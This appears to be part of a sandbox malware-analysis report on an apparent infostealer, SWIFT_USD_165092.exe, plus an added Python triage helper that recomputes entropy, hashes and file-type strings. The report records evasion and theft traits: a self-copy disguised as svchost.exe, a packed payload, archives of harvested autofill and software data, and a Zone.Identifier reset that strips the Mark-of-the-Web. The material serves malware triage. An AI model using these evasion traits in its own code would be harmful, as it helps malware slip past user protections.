                                                                                      SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                                                                      SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.7876734657715041
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                      MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                      SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                      SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                      SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.7876734657715041
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                      MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                      SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                      SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                      SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):778434
                                                                                      Entropy (8bit):7.996164952957405
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:54j9Vbj9VjEj9V0j9VcS8DfDjVRXrESMRj9Vjuj9VjWj9VjLj9Vji:54jbbjbjEjb0jbcS8D7HXrESMRjbjujL
                                                                                      MD5:F701569F3BE6D7BF532DDF9D19C2AFEB
                                                                                      SHA1:6CC5BEABD0DD189A3615452AC53F66365F8A70B0
                                                                                      SHA-256:3BBDC796010EE600B24868E7B73A8D8DF1094532F3CD67CD83B7B958E110809D
                                                                                      SHA-512:76C192444E37DBADC059834D2BD5144E9CB3DB9F0722468A4BE15A81010262F84A87B1AFA31FD5F724EE9DBF900BC945ED26871A1A4A9852AB25C8F866D89674
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:PK........9..V.x..<...M.....$.22-05-2023 22-47-44.txt.. .........gm]>!...gm]>!...gm]>!...SVVVH.(../J-RP.r4..t.Lu......-.L..-5...@r..E.......L.LL4..PK........I..V..............$.BuildTag.txt.. ............O!......O!......O!...PK........H..V..............$.ImportantAutofills.txt.. ..........H.N!....H.N!....H.N!...PK........G..V.5..[.........$.Installed Software.txt.. .........>.gM!...>.gM!...>.gM!.......0...H...A.Vv..-....D*[....$Nkm....,o..qD..}1..+%Z'.c...<3....0S...S...K..n..^g.......+.*.MS.K..LeQ(.".yV.'._.j...tB...v9sj....S.V.7:....rXUN.*r.F....ad.Ki..f.DX..W./.c.9e.5....H.\......\..wi.u.k6..h.(.[[w....[...T...9j....[.;j._....|.._.$nY.....\B..>...M..1.Fa.....7W.{m.....S$......U.cQ@"!Fcd..._..|..3.,r....1.h.We...o.H',.....*..V..]..?{pi..... ^m......fzv....q..V.r..R[..T.....q....v.O.D.....i.(...`...P...Q3y.wa.@.....C..c.]#...Oc4I0....#aa!EBkx>.C..o..5.{-.qB.....~k...V{..D]!.3...k..........V..V8lF08ti!..{...(;...|..1.F]]v.....=.*.=..u5.=...6dRZ<.D..^
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):553940
                                                                                      Entropy (8bit):7.995901837653764
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:pj9VjAj9Vjtj9VjYj9VtK0j9VtKImW9X/j9VtK5:pjbjAjbjtjbjYjbDjbhmaX/jba
                                                                                      MD5:91E0972F9334B014A130A1CA206FEC74
                                                                                      SHA1:F7B45F16A65C2C88219C24753AB66F5434830406
                                                                                      SHA-256:CCF080F4D17867E5714762A3919202CB27BCDB123E87F343BCCA66B0B73C93CF
                                                                                      SHA-512:C4CDF552E259A265CC0682C440C272850CF21F621EA7D0AB3C8B1D84984ED0512A9BE1A631019EB75F433895F3038B75E52EC9FF5FC6129366B5B0FCBB12E84B
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:PK........P..V..U.<...M.....$.22-05-2023 22-41-22.txt.. .........:..X!...:..X!...:..X!...SVVVH.(../J-RP.r4..t.Lu......-.L..,4...@r..E.......L....4..PK........h..V..............$.BuildTag.txt.. ..........3.q!....3.q!....3.q!...PK........d..V..............$.ImportantAutofills.txt.. ...........~m!.....~m!.....~m!...PK........b..V.5..[.........$.Installed Software.txt.. ..........L.j!....L.j!...C..j!.......0...H...A.Vv..-....D*[....$Nkm....,o..qD..}1..+%Z'.c...<3....0S...S...K..n..^g.......+.*.MS.K..LeQ(.".yV.'._.j...tB...v9sj....S.V.7:....rXUN.*r.F....ad.Ki..f.DX..W./.c.9e.5....H.\......\..wi.u.k6..h.(.[[w....[...T...9j....[.;j._....|.._.$nY.....\B..>...M..1.Fa.....7W.{m.....S$......U.cQ@"!Fcd..._..|..3.,r....1.h.We...o.H',.....*..V..]..?{pi..... ^m......fzv....q..V.r..R[..T.....q....v.O.D.....i.(...`...P...Q3y.wa.@.....C..c.]#...Oc4I0....#aa!EBkx>.C..o..5.{-.qB.....~k...V{..D]!.3...k..........V..V8lF08ti!..{...(;...|..1.F]]v.....=.*.=..u5.=...6dRZ<.D..^
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):778434
                                                                                      Entropy (8bit):7.996164952957405
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:54j9Vbj9VjEj9V0j9VcS8DfDjVRXrESMRj9Vjuj9VjWj9VjLj9Vji:54jbbjbjEjb0jbcS8D7HXrESMRjbjujL
                                                                                      MD5:F701569F3BE6D7BF532DDF9D19C2AFEB
                                                                                      SHA1:6CC5BEABD0DD189A3615452AC53F66365F8A70B0
                                                                                      SHA-256:3BBDC796010EE600B24868E7B73A8D8DF1094532F3CD67CD83B7B958E110809D
                                                                                      SHA-512:76C192444E37DBADC059834D2BD5144E9CB3DB9F0722468A4BE15A81010262F84A87B1AFA31FD5F724EE9DBF900BC945ED26871A1A4A9852AB25C8F866D89674
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:PK........9..V.x..<...M.....$.22-05-2023 22-47-44.txt.. .........gm]>!...gm]>!...gm]>!...SVVVH.(../J-RP.r4..t.Lu......-.L..-5...@r..E.......L.LL4..PK........I..V..............$.BuildTag.txt.. ............O!......O!......O!...PK........H..V..............$.ImportantAutofills.txt.. ..........H.N!....H.N!....H.N!...PK........G..V.5..[.........$.Installed Software.txt.. .........>.gM!...>.gM!...>.gM!.......0...H...A.Vv..-....D*[....$Nkm....,o..qD..}1..+%Z'.c...<3....0S...S...K..n..^g.......+.*.MS.K..LeQ(.".yV.'._.j...tB...v9sj....S.V.7:....rXUN.*r.F....ad.Ki..f.DX..W./.c.9e.5....H.\......\..wi.u.k6..h.(.[[w....[...T...9j....[.;j._....|.._.$nY.....\B..>...M..1.Fa.....7W.{m.....S$......U.cQ@"!Fcd..._..|..3.,r....1.h.We...o.H',.....*..V..]..?{pi..... ^m......fzv....q..V.r..R[..T.....q....v.O.D.....i.(...`...P...Q3y.wa.@.....C..c.]#...Oc4I0....#aa!EBkx>.C..o..5.{-.qB.....~k...V{..D]!.3...k..........V..V8lF08ti!..{...(;...|..1.F]]v.....=.*.=..u5.=...6dRZ<.D..^
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):553940
                                                                                      Entropy (8bit):7.995901837653764
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:pj9VjAj9Vjtj9VjYj9VtK0j9VtKImW9X/j9VtK5:pjbjAjbjtjbjYjbDjbhmaX/jba
                                                                                      MD5:91E0972F9334B014A130A1CA206FEC74
                                                                                      SHA1:F7B45F16A65C2C88219C24753AB66F5434830406
                                                                                      SHA-256:CCF080F4D17867E5714762A3919202CB27BCDB123E87F343BCCA66B0B73C93CF
                                                                                      SHA-512:C4CDF552E259A265CC0682C440C272850CF21F621EA7D0AB3C8B1D84984ED0512A9BE1A631019EB75F433895F3038B75E52EC9FF5FC6129366B5B0FCBB12E84B
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:PK........P..V..U.<...M.....$.22-05-2023 22-41-22.txt.. .........:..X!...:..X!...:..X!...SVVVH.(../J-RP.r4..t.Lu......-.L..,4...@r..E.......L....4..PK........h..V..............$.BuildTag.txt.. ..........3.q!....3.q!....3.q!...PK........d..V..............$.ImportantAutofills.txt.. ...........~m!.....~m!.....~m!...PK........b..V.5..[.........$.Installed Software.txt.. ..........L.j!....L.j!...C..j!.......0...H...A.Vv..-....D*[....$Nkm....,o..qD..}1..+%Z'.c...<3....0S...S...K..n..^g.......+.*.MS.K..LeQ(.".yV.'._.j...tB...v9sj....S.V.7:....rXUN.*r.F....ad.Ki..f.DX..W./.c.9e.5....H.\......\..wi.u.k6..h.(.[[w....[...T...9j....[.;j._....|.._.$nY.....\B..>...M..1.Fa.....7W.{m.....S$......U.cQ@"!Fcd..._..|..3.,r....1.h.We...o.H',.....*..V..]..?{pi..... ^m......fzv....q..V.r..R[..T.....q....v.O.D.....i.(...`...P...Q3y.wa.@.....C..c.]#...Oc4I0....#aa!EBkx>.C..o..5.{-.qB.....~k...V{..D]!.3...k..........V..V8lF08ti!..{...(;...|..1.F]]v.....=.*.=..u5.=...6dRZ<.D..^
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):0.4393511334109407
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TLqlj1czkwubXYFpFNYcw+6UwcYzHrSl:TyxcYwuLopFgU1YzLSl
                                                                                      MD5:8C31C5487A97BBE73711C5E20600C1F6
                                                                                      SHA1:D4D6B04226D8FFC894749B3963E7DB7068D6D773
                                                                                      SHA-256:A1326E74262F4B37628F2E712EC077F499B113181A1E937E752D046E43F1689A
                                                                                      SHA-512:394391350524B994504F4E748CCD5C3FA8EF980AED850A5A60F09250E8261AC8E300657CBB1DBF305729637BC0E1F043E57799E2A35C82EEA3825CE5C9E7051D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):94208
                                                                                      Entropy (8bit):1.287139506398081
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                                                                      MD5:292F98D765C8712910776C89ADDE2311
                                                                                      SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
                                                                                      SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                                                                      SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):94208
                                                                                      Entropy (8bit):1.287139506398081
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                                                                      MD5:292F98D765C8712910776C89ADDE2311
                                                                                      SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
                                                                                      SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                                                                      SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):94208
                                                                                      Entropy (8bit):1.287139506398081
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                                                                      MD5:292F98D765C8712910776C89ADDE2311
                                                                                      SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
                                                                                      SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                                                                      SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):0.4393511334109407
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TLqlj1czkwubXYFpFNYcw+6UwcYzHrSl:TyxcYwuLopFgU1YzLSl
                                                                                      MD5:8C31C5487A97BBE73711C5E20600C1F6
                                                                                      SHA1:D4D6B04226D8FFC894749B3963E7DB7068D6D773
                                                                                      SHA-256:A1326E74262F4B37628F2E712EC077F499B113181A1E937E752D046E43F1689A
                                                                                      SHA-512:394391350524B994504F4E748CCD5C3FA8EF980AED850A5A60F09250E8261AC8E300657CBB1DBF305729637BC0E1F043E57799E2A35C82EEA3825CE5C9E7051D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):2164736
                                                                                      Entropy (8bit):7.996381105117679
                                                                                      Encrypted:true
                                                                                      SSDEEP:49152:P0Ux5jMHPPoTAlFra5La9wMgtHr2yyP3HkYR+:Ppx5ovTTra5KMHOfR
                                                                                      MD5:22BA147ED50FF44941FE486426432115
                                                                                      SHA1:A113BCCA40C9C420442533589311A74EF0E30E96
                                                                                      SHA-256:BEBD7434928EB7D1FB89A84BA41C3838FB5734F446B58B8BFB2D5DDDF48E518B
                                                                                      SHA-512:FF096D099A27AD7B4FBD85E2B28689ED92E9BC8AB59C0DFBBB8328284A79160507E1C7BFF31665BC07B146FAEC1268A1868E4AB0155AF00D0D38C86164870C18
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 32%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....jd.................. ...........!.. ... !...@.. .......................`!...........@.................................y.!.J.... !.z....................@!...................................................... ............... ..H............text..... .. .... ................. ..`.rsrc...z.... !.......!.............@..@.reloc.......@!.......!.............@..B..................!.....H.......LG...Q............... ..........................................0..+.......~,... ....+.+...(....+.(....+.~.....(.....*...................(\...*.0..&.......~,... ....+.+...(....+.(....+..(.....*....................(....*..(\...*.0..........~]...8.....8....8....8............_....c.._......1 ~4........Y.AX.....(^...(.....+.~4......(_...(.........1 ~4........Y.AX.....(^...(.....+.~4......(_...(.......X..i....X.]-.~4.... ....(....(.......X....i?D....*.81....81....85......
                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):26
                                                                                      Entropy (8bit):3.95006375643621
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                      Malicious:true
                                                                                      Reputation:unknown
                                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                      Category:dropped
                                                                                      Size (bytes):1572864
                                                                                      Entropy (8bit):4.343350466599119
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:CW/mIvFzlLvRHoi1iqK79BUQ3Bw+Z1kZgaItr52wyfmog1RQiD6kC:v/mIvFzlLvRHoi1i/F
                                                                                      MD5:0C72ED6EAAA571B212480B302DA4446F
                                                                                      SHA1:00CC31852822CC49B84BC396C1D5EE0D3F8DBE50
                                                                                      SHA-256:E9A5EE0A199A9A7C5CBA8460D6F9FBFC26895AA95980B78156FF2FF659E2F10F
                                                                                      SHA-512:3900663502FB06B6814B626228F4A381196F83F4E0FBFD175AF3E16A1ABF0C13E4E197F8EF15B34030666D40DB1D5136D90FB5AB01D8146D543CBBBCD2EBC2CE
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:regfY...Y...p.\..,.................. ....P......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmn88U!.................................................................................................................................................................................................................................................................................................................................................1.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):4.169392061564389
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:CV1yHUMr4LK3XJeGnyemcJ7Ujfi4RjU2xephfEu9EXv3:qZKRye
                                                                                      MD5:0262CB923B8A39D03F478D3E4B357146
                                                                                      SHA1:0516990FDD95657F7959212835F9D7B409337EE4
                                                                                      SHA-256:92CFCD1B8B9F4EA4B25BB8AE60345189116178FE5464EC013E0799B9BB178918
                                                                                      SHA-512:7F344DBBAEC103D4438E07192FACB827E860D2D84F983D70A39A2AC192E66C9F62775CE328DD47A9876FAAF44DC437EB69EED4C4452F0118C67F61DF4BAFCDED
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:regfX...X...p.\..,.................. ....P......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmn88U!.................................................................................................................................................................................................................................................................................................................................................1.HvLE.n......X....P............M.lk.I}wQ..........p............... ...0..hbin................p.\..,..........nk,.l88U!................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .l88U!....... ...........P............... .......Z.......................Root........lf......Root....nk .l88U!....................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...
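The rows above are the dropped-file inventory: SQLite databases written by the svchost.exe copy and by the sample itself, a PE written by cmd.exe whose MD5/SHA-256 equal those of the submitted SWIFT_USD_165092.exe, a 26-byte Zone.Identifier stream (category "modified") carrying ZoneId=0, and two Amcache.hve hives produced by WerFault.exe after the crash. Two of these rows deserve a second look during triage: the self-copy has entropy 7.996 and is flagged Encrypted, which for a .NET executable means the managed payload is packed or encrypted and the native header is the only thing static tools can read; and ZoneId=0 is URLZONE_LOCAL_MACHINE, so whatever rewrote that stream left the copied executable without the Internet-zone Mark-of-the-Web that SmartScreen keys on. The Python below is an added triage helper, not code from the Joe Sandbox report: it recomputes the per-row figures (8-bit entropy, the four hashes, the libmagic-style SQLite description rebuilt from the 100-byte header) and parses a Zone.Identifier stream. All inputs are constructed; the 7.9 entropy cut-off for the Encrypted flag and the rule that the page size is printed only when it differs from the 4096 default are assumptions inferred from the rows above, not documented Joe Sandbox or file(1) behaviour.

```python
"""Triage helpers for dropped-file rows (added example; constructed inputs only)."""
import hashlib
import math
import struct

SQLITE_MAGIC = b"SQLite format 3\x00"
TEXT_ENCODINGS = {1: "UTF-8", 2: "UTF-16le", 3: "UTF-16be"}
ZONE_NAMES = {0: "LocalMachine", 1: "Intranet", 2: "Trusted", 3: "Internet", 4: "Untrusted"}
ENCRYPTED_THRESHOLD = 7.9   # assumption: approximates the report's Encrypted:true cut-off


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (the report's 'Entropy (8bit)'):
    0.0 for a constant file, 8.0 for uniformly random, encrypted or well-compressed data."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def hashes(data: bytes) -> dict:
    """MD5/SHA1/SHA-256/SHA-512 in the upper-case form the report rows use."""
    return {n: hashlib.new(n, data).hexdigest().upper() for n in ("md5", "sha1", "sha256", "sha512")}


def describe_sqlite(data: bytes) -> str:
    """Rebuild the libmagic-style 'File Type' string from the 100-byte SQLite header.
    Offsets follow the SQLite file-format spec: page size @16 (big-endian, 1 means 65536),
    change counter @24, page count @28, first freelist trunk page @32, freelist page count @36,
    schema cookie @40, schema format @44, text encoding @56, version-valid-for @92, library @96."""
    if len(data) < 100:
        return "SQLite 3.x database (truncated header)"
    page_size = struct.unpack_from(">H", data, 16)[0]
    page_size = 65536 if page_size == 1 else page_size
    counter, pages, first_free, free_pages, cookie, schema = struct.unpack_from(">6I", data, 24)
    encoding = struct.unpack_from(">I", data, 56)[0]
    valid_for, version = struct.unpack_from(">II", data, 92)
    parts = [f"SQLite 3.x database, last written using SQLite version {version}"]
    if page_size != 4096:   # assumption: page size is printed only when not the 4096 default
        parts.append(f"page size {page_size}")
    parts += [f"file counter {counter}", f"database pages {pages}"]
    if first_free:
        parts += [f"1st free page {first_free}", f"free pages {free_pages}"]
    parts += [f"cookie {cookie:#x}", f"schema {schema}",
              TEXT_ENCODINGS.get(encoding, f"encoding {encoding}"), f"version-valid-for {valid_for}"]
    return ", ".join(parts)


def parse_zone_identifier(data: bytes) -> dict:
    """Parse a Zone.Identifier alternate data stream ([ZoneTransfer] ini block).
    ZoneId 3 or 4 is the Mark-of-the-Web SmartScreen acts on; ZoneId=0 is LocalMachine,
    so a stream rewritten to 0 no longer carries the mark."""
    fields = {}
    for line in data.decode("ascii", "replace").splitlines():
        if "=" in line and not line.startswith("["):
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip()
    zone = int(fields.get("ZoneId", "-1"))
    return {"zone_id": zone, "zone": ZONE_NAMES.get(zone, "unknown"),
            "mark_of_the_web": zone in (3, 4), "fields": fields}


def triage(data: bytes) -> dict:
    """Type a dropped file by its magic bytes and attach size, entropy, hashes and Encrypted flag."""
    if data.startswith(SQLITE_MAGIC):
        ftype = describe_sqlite(data)
    elif data.startswith(b"MZ"):
        ftype = "PE executable (MZ header)"
    elif data.startswith(b"regf"):
        ftype = "MS Windows registry hive (regf)"
    elif data.startswith(b"[ZoneTransfer]"):
        ftype = "Zone.Identifier stream, ZoneId=%d" % parse_zone_identifier(data)["zone_id"]
    else:
        ftype = "unknown"
    entropy = shannon_entropy(data)
    return {"file_type": ftype, "size": len(data), "entropy": round(entropy, 6),
            "encrypted": entropy >= ENCRYPTED_THRESHOLD, **hashes(data)}


def build_sqlite_header(page_size=2048, counter=3, pages=45, first_free=0, free_pages=0,
                        cookie=0x3D, schema=4, valid_for=3, version=3038005) -> bytes:
    """Constructed 100-byte header; the defaults mirror the values reported for the 94208-byte DB."""
    h = bytearray(100)
    h[:16] = SQLITE_MAGIC
    struct.pack_into(">HBBBBBB", h, 16, page_size, 1, 1, 0, 64, 32, 32)   # size, versions, fractions
    struct.pack_into(">6I", h, 24, counter, pages, first_free, free_pages, cookie, schema)
    struct.pack_into(">I", h, 56, 1)                                      # 1 = UTF-8
    struct.pack_into(">II", h, 92, valid_for, version)
    return bytes(h)


if __name__ == "__main__":
    # constructed inputs: a header like the 94208-byte DB, a 26-byte ZoneId=0 stream, a bare MZ stub
    for blob in (build_sqlite_header(), b"[ZoneTransfer]\r\nZoneId=0\r\n", b"MZ" + bytes(510)):
        print(triage(blob))
```

`describe_sqlite` on the default header reproduces the 94208-byte rows' File Type string character for character, and with `page_size=4096, counter=10, pages=7, first_free=5, free_pages=2, cookie=0x13, valid_for=10` it reproduces the 28672-byte row, which is the check that the offsets and the page-size rule are right. When triaging a real drop, run `triage()` over the file and diff the result against the report row: a hash mismatch means the sandbox saw a different file than the one you were handed.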
                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Entropy (8bit):7.996381105117679
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                      File name:SWIFT_USD_165092.exe
                                                                                      File size:2164736
                                                                                      MD5:22ba147ed50ff44941fe486426432115
                                                                                      SHA1:a113bcca40c9c420442533589311a74ef0e30e96
                                                                                      SHA256:bebd7434928eb7d1fb89a84ba41c3838fb5734f446b58b8bfb2d5dddf48e518b
                                                                                      SHA512:ff096d099a27ad7b4fbd85e2b28689ed92e9bc8ab59c0dfbbb8328284a79160507e1c7bff31665bc07b146faec1268a1868e4ab0155af00d0d38c86164870c18
                                                                                      SSDEEP:49152:P0Ux5jMHPPoTAlFra5La9wMgtHr2yyP3HkYR+:Ppx5ovTTra5KMHOfR
                                                                                      TLSH:C0A53308FAF5092FCE66A2FC7C3B41282ADDE46A8358FB3799D24197D0557F4A527203
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....jd.................. ...........!.. ... !...@.. .......................`!...........@................................
                                                                                      Icon Hash:90cececece8e8eb0
                                                                                      Entrypoint:0x611cc3
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
